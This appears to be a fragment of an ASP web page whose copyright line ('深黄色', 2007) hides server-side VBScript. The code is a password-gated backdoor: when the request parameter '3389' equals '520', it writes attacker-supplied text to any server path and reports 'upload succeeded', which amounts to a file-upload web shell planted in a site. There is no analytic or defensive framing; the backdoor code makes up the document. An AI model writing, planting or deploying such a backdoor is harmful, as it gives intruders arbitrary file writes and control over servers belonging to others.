|
|
|
|
|
|
|
|
| 版权所有 Copyright© 2007 深黄色" '版权信息
if Request("3389")="520" then 'by:-[°深黄色、]
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "-[°深黄色、]成功上传!"
end if
Response.write ""
Response.end
end if
%>
<% ' |
|